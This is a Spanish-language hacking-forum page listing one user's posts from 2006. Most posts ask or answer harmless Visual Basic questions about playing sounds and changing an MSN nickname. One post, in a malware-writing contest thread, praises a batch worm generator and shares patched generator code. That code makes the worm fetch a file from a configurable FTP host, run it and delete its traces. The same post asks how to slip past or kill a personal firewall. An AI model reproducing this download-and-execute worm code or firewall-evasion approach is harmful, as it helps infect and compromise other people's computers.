elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


  Mostrar Mensajes
Páginas: 1 [2]
11  Programación / Programación Visual Basic / Re: como se reproducen sonidos? en: 21 Abril 2006, 15:32 pm
Wenas yo utilizo este codigo (puedes reproducir archivos wav y midi).

Mete este codigo en 1 modulo:
Código:
Declare Function mciExecute Lib "winmm.dll" (ByVal lpstrCommand As String) As Long

En el form escribe esto:
Código:
iResult = mciExecute("Play RUTA DEL ARCHIVO")

Para pararlo solo cambia el Play por un stop.

Este codigo lo he sacado de:
http://www.elhacker.net/trucosvisual.htm

Ahi teines bastantes codigos interesantes ;)

-salu2-
12  Seguridad Informática / Abril negro / Re: [Abril Negro] Generador de Worms en Batch (By Hendrix) en: 18 Abril 2006, 16:33 pm
Muy buen trabajo _Hendrix_  :D :D

Una cosa, la opcion de bajar el archivo por FTP no me iba bien me daba password incorrecto... no se si a alguien mas le ha pasado??
Bueno lo que hice fue editar el codigo que genera el archivo datos.txt juntando los espacios que quedaban entre medio, asi al final descargo el archivo. Supongo que el error era ese que cogia los espacios como parte de la contraseńa o el nombre.

Yo cambie en el Generador de Worms 3sk0r8ut0.bat esto y ya me funciona bien ;D

Código:
:down1
echo echo %ftpnom%^>C:\datos.txt>>C:\%name%.bat
echo echo %ftpas%^>^>C:\datos.txt>>C:\%name%.bat
echo echo put C:\datos.txt datos.txt^>^>C:\datos.txt>>C:\%name%.bat
echo echo binary^>^>C:\datos.txt>>C:\%name%.bat
echo echo get %ftpfile% %ftpruta%\%ftpfile%^>^>C:\datos.txt>>C:\%name%.bat
echo echo delete datos.txt^>^>C:\datos.txt>>C:\%name%.bat
echo echo bye^>^>C:\datos.txt>>C:\%name%.bat
echo ftp -s:C:\datos.txt %ftpftp% >>C:\%name%.bat
echo del /s /q C:\datos.txt >>C:\%name%.bat
echo start %ftpruta%\%ftpfile% >>C:\%name%.bat
cls

Y una pregunta el descargador de archivos es detectado por firewall del XP? Yo lo he probado en el firewall de Sygate y me lo detecto :-\
Habrial alguna forma de saltarse este firewall? o habria que matar el proceso primero?

-salu2-
13  Programación / Programación Visual Basic / Re: Ayuda cambiar nick MSN en: 13 Abril 2006, 02:27 am
Muxas gracias ®ŘßÖkÖŢ, pero ese manual ya me lo lei ace tiempo, en el utilizan el mismo metodo que yo utilizo...

Aver si hay alguna forma de hacerlo sin utilizar las APIs del MSN, nuse :rolleyes: si se podra soy nuevo en esto del VB.

-salu2- y Gracias.
14  Programación / Programación Visual Basic / Ayuda cambiar nick MSN en: 11 Abril 2006, 21:40 pm
Wenas a todos! stoy haciendo un programita k canvie el nick del msn kada cierto tiempo (el k eliga el usuario), utilizo el codigo:

MSN.OptionsPages 0, MOPT_GENERAL_PAGE
SendKeys (Text1.Text & "{ENTER}")

pero al utilizar este codigo se ve la ventana d configuracion del msn por muy poco tiempo, ntonces en mi programa si se va canviando el codigo continuamente estas apariciones molestan...

Hay alguna otra manera de canviar el nick del msn? o de ocultar esta ventana? o quizas estoy haciendo algo mal y esto no tendria k aparecer nuse:S, weno si alguien sabe algo a ver si me puede ayudar xfavor.

-salu2-
Páginas: 1 [2]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines